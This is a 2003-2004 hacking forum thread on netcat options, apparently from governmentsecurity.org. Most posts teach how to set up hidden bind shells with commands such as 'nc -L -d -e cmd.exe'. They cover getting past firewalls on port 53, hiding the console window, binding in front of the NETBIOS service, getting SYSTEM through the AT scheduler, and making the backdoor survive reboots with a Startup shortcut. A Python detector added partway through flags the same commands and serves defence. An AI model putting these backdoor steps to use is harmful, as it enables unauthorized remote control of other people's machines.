s0v1v1d
Oct 21 2003, 02:42 PM
I recently took a look at a tutorial for netcat that was posted. I did find it useful but it did not explain the function of individual commands, or rather options. Is there a listing of netcat commands somewhere in the forums, or a link to a place where I can find them? I have tried searching using the site search engine as well as Google but have not found any results. Perhaps I am using poor keywords. If anyone has a source for this information I would greatly appreciate it.
Thanks,
v1v1d
ATB
Oct 21 2003, 03:21 PM
Here u go... 10x for who posted it b4...
To use Netcat to retrieve the home page of a web site use the command:
nc -v www.website.com 80 < get.txt
You will see Netcat make a connection to port 80, send the text contained
in the file get.txt, and then output the web server's response to stdout.
The -v is for verbose. It tells you a little info about the connection
when it starts.
It is a bit easier to just open the connection and then type at the console
to do the same thing.
nc -v www.website.com 80
Then just type in GET / HTTP/1.0 and hit a couple of returns. You will
see the same thing as above.
A far more exciting thing to do is to get a quick shell going on a remote
machine by using the -l or "listen" option and the -e or "execute"
option. You run Netcat listening on a particular port for a connection.
When a connection is made, Netcat executes the program of your choice
and connects the stdin and stdout of the program to the network connection.
nc -l -p 23 -t -e cmd.exe
will get Netcat listening on port 23 (telnet). When it gets connected to
by a client it will spawn a shell (cmd.exe). The -t option tells Netcat
to handle any telnet negotiation the client might expect.
This will allow you to telnet to the machine you have Netcat listening on
and get a cmd.exe shell when you connect. You could just as well use
Netcat instead of telnet:
nc xxx.xxx.xxx.xxx 23
will get the job done. There is no authentication on the listening side
so be a bit careful here. The shell is running with the permissions of the
process that started Netcat so be very careful. If you were to use the
AT program to schedule Netcat to run listening on a port with the
-e cmd.exe option, when you connected you would get a shell with user
NT AUTHORITY\SYSTEM.
The beauty of Netcat really shines when you realize that you can get it
listening on ANY port doing the same thing. Do a little exploring and
see if the firewall you may be behind lets port 53 through. Run Netcat
listening behind the firewall on port 53.
nc -L -p 53 -e cmd.exe
Then from outside the firewall connect to the listening machine:
nc -v xxx.xxx.xxx.xx 53
If you get a command prompt then you are executing commands on the
listening machine. Use 'exit' at the command prompt for a clean
disconnect. The -L (note the capital L) option will restart Netcat with
the same command line when the connection is terminated. This way you can
connect over and over to the same Netcat process.
A new feature for the NT version is the -d or detach from console flag.
This will let Netcat run without an ugly console window cluttering up the
screen or showing up in the task list.
You can even get Netcat to listen on the NETBIOS ports that are probably
running on most NT machines. This way you can get a connection to a
machine that may have port filtering enabled in the TCP/IP Security Network
control panel. Unlike Unix, NT does not seem to have any security around
which ports that user programs are allowed to bind to. This means any
user can run a program that will bind to the NETBIOS ports.
You will need to bind "in front of" some services that may already be
listening on those ports. An example is the NETBIOS Session Service that
is running on port 139 of NT machines that are sharing files. You need
to bind to a specific source address (one of the IP addresses of the
machine) to accomplish this. This gives Netcat priority over the NETBIOS
service which is at a lower priority because it is bound to ANY IP address.
This is done with the Netcat -s option:
nc -v -L -e cmd.exe -p 139 -s xxx.xxx.xxx.xxx
Now you can connect to the machine on port 139 and Netcat will field
the connection before NETBIOS does. You have effectively shut off
file sharing on this machine by the way. You have done this with just
user privileges to boot.
PROBLEMS with Netcat 1.1 for NT
There are a few known problems that will eventually be fixed. One is
the -w or timeout option. This works for final net reads but not
for connections. Another problem is using the -e option in UDP mode.
You may find that some of the features work on Windows 95. Most
of the listening features will not work on Windows 95 however. These will
be fixed in a later release.
Netcat is distributed with full source code so that people can build
upon this work. If you add something useful or discover something
interesting about NT TCP/IP let me know.
ssj4conejo
Oct 21 2003, 09:02 PM
Can you possibly make netcat spawn a telnet shell instead of cmd.exe? I try this but it doesn't do anything.
hermel
Oct 22 2003, 10:05 AM
THX for the good explanation ATB
KrYsSaR
Oct 28 2003, 09:00 AM
I've been looking for info about the commands for netcat for a while now.
so thanks a lot for your good explanation =)
I've experimented a little bit with it but I haven't been able to spawn a shell with it yet.
now I have some more to experiment with =)
cheerz
//KrYsSaR
Flowby
Oct 28 2003, 09:11 PM
Thanks man, cool info!
damulint
Dec 8 2003, 05:26 AM
Thanks for ATB..
Useful NC Guide..
DJVASTVASTY2K
Dec 16 2003, 05:52 AM
Hello M8's
Hope This Helps, Should Be Pretty Basic After That.
Good Luck
Best Regards
Adam
Vast Gsm
C:\>nc -h
[v1.10 NT]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, stealth mode
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]
C:\>
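As an added defender-side example (not code from the thread or from the Netcat project), the following Python parses netcat 1.10 command lines using the option table in the nc -h output above and flags the invocations ATB's post describes: -e cmd.exe behind -l or -L, -d detach, -s binding in front of a service, and listeners on well-known ports such as 23, 53 and 139. It is the kind of check you would run over Sysmon process-creation events or wmic process get commandline output; the sample command lines are constructed from the ones quoted in the thread, and the non-listening case (-e on an outbound connect) is handled as well although the thread does not show it.

```python
import os
ARG_OPTS = set("egGiopsw")   # netcat 1.10 options that take a value (see nc -h above)
NETCAT = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}
SHELLS = {"cmd.exe", "cmd", "command.com", "powershell.exe", "sh", "bash"}
CONTEXT = {"L": "re-listens (-L)", "d": "detached from console (-d)", "s": "bound to a source address (-s)"}
# Constructed sample process command lines: the ones quoted in the thread plus two benign ones
SAMPLES = ["nc -v www.website.com 80", "nc -l -p 23 -t -e cmd.exe", "nc -L -p 53 -e cmd.exe",
           "nc -v -L -e cmd.exe -p 139 -s 10.0.0.5", r"C:\Windows\System32\nc.exe -L -p 3388 -d -e cmd.exe",
           "nc -z -v 10.0.0.7 20-80", "notepad.exe readme.txt"]

def parse_nc_cmdline(cmdline):   # -> {flag: value or count, "_args": [...]} or None if not netcat
    argv = cmdline.split()
    exe = os.path.basename(argv[0].replace("\\", "/")).lower() if argv else ""
    if exe not in NETCAT:
        return None
    opts, positional, i = {}, [], 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("-") and len(tok) > 1:
            for j, ch in enumerate(tok[1:]):      # bundled flags such as -vv are counted
                if ch in ARG_OPTS:               # value is the rest of the token, else the next token
                    opts[ch] = tok[j + 2:]
                    if not opts[ch]:
                        i += 1
                        opts[ch] = argv[i] if i < len(argv) else ""
                    break
                opts[ch] = opts.get(ch, 0) + 1
        else:
            positional.append(tok)
        i += 1
    opts["_args"] = positional
    return opts

def classify(cmdline):
    """Finding dict when netcat hands a shell to the network (-e <shell>); None otherwise."""
    opts = parse_nc_cmdline(cmdline)
    if opts is None or "e" not in opts:
        return None
    prog = os.path.basename(opts["e"].replace("\\", "/")).lower()
    if prog not in SHELLS:
        return None
    listening = "l" in opts or "L" in opts
    port = opts.get("p") if listening else (opts["_args"] or [None])[-1]   # -p, or last positional
    notes = [msg for flag, msg in CONTEXT.items() if flag in opts]
    if port and port.isdigit() and int(port) < 1024:
        notes.append("uses well-known port %s" % port)
    return {"kind": "bind shell" if listening else "outbound shell", "exec": prog, "port": port, "notes": notes}

def scan(cmdlines=SAMPLES):
    """Findings for every command line that hands out a shell, keyed by command line."""
    return {c: f for c in cmdlines if (f := classify(c))}
```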
Blast3rPL
Dec 16 2003, 02:29 PM
I'm using nc.exe -l -p xxxx -e cmd.exe & nc.exe -vv IP port and I hadn't got any problems. But I want to add that in IIS 5.0/4.0 the default NC port isn't working. In IIS use port 99.
SkyRaVeR
Dec 18 2003, 07:12 AM
nice thingie! didn't know 'bout that -e option
saiko13
Dec 18 2003, 10:06 AM
great info THX... really useful...
devil666
Dec 18 2003, 11:02 AM
Nice Tut,
Thanx
rastis_monkey
Dec 19 2003, 05:00 AM
Is netcat better than telnet? What are the pros vs cons?
flame
Dec 19 2003, 07:24 PM
| QUOTE (rastis_monkey @ Dec 19 2003, 05:00 AM) |
| Is netcat better than telnet? What are the pros vs cons? |
do you speak english ?
did you read the post ?
did you even listen ?
you need a netcat for your brain to listen for incoming information.
go play PS2 or something ...
let me repeat that for you :
-d detach from console, stealth mode
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]
the red is what telnet does
the blue is what netcat does
skorpio
Dec 20 2003, 08:35 PM
Is it possible to install netcat as a service on a computer?
For example, is it possible to install a service that executes the command nc -L -p 4242 -d -e cmd.exe every time the machine is rebooted?
thx bye and sorry 4 my english
nulladd
Dec 21 2003, 05:00 PM
yes you can, there is a tool in the downloads section, however you can't access this yet unless someone makes it public
but why not try other startup methods like in this thread
http://www.governmentsecurity.org/forum/in...?showtopic=5085
skorpio
Dec 21 2003, 05:17 PM
very thx nulladd !!!!
now I go to read the 3d

thx bye
skorpio
Dec 21 2003, 05:22 PM
I have read the 3d, but I do not understand like making to make to leave beyond to the exe to giving the necessary attributes to the nc.
For example I would want to make to leave to every reboot
nc.exe -L -p 3388 -d -e cmd.exe
but with those methods is impossible!

sorry 4 my english bye
nulladd
Dec 21 2003, 05:55 PM
simple solution
create a shortcut in your startup folder with the path
c:\windows\system32\nc.exe -L -p port -d -e cmd.exe
this path may vary depending on your config
skorpio
Dec 21 2003, 07:58 PM
yes, but if I work in a shell, how do I create a shortcut in:
C:\Documents and Settings\USER\Start Menu\Programs\Startup
that contains in the path:
c:\windows\system32\nc.exe -L -p port -d -e cmd.exe
???
thx for your availability
bye
ara2
Jan 6 2004, 11:27 PM
http://savage.net.au/MSWindows/html/nc.html this is the netcat bible I always refer to. It explains every switch very well.
zola
Jan 12 2004, 04:43 AM
the manual you guys wrote seems similar to the manual i got when extracting netcat.
what
Jan 24 2004, 07:27 AM
I was wondering if it was possible to use netcat to do a series of steps.
first; listen on a local TCP port and wait for a connection
second; when the connection is made, forward it to a different port.
not so hard so far, but I want this other port to be UDP, not TCP. Is there any way to make this work?
Let me clarify more. Say I set up netcat to listen on TCP port 81. Then have it tunnel all incoming connections to UDP port 445. This would be very helpful. Thanks ahead of time.
zola
Jan 28 2004, 08:28 AM
this is some addition to the cautious ones out there. I believe that the port can be changed instead of 8080. I had not tried because this tool takes a long time on my PC.
here it goes (can grab command shell ):
cmd line remote control tools
nc in stealth mode : -d = stealth, -e = prog to launch
1. nc -L -d -e cmd.exe -p 8080
2. nc xxx.xxx.xxx.xx 8080
phaeton
Jan 28 2004, 02:51 PM
Thanks for the good information, I never knew that netcat could listen on an open port, that works well for me =D.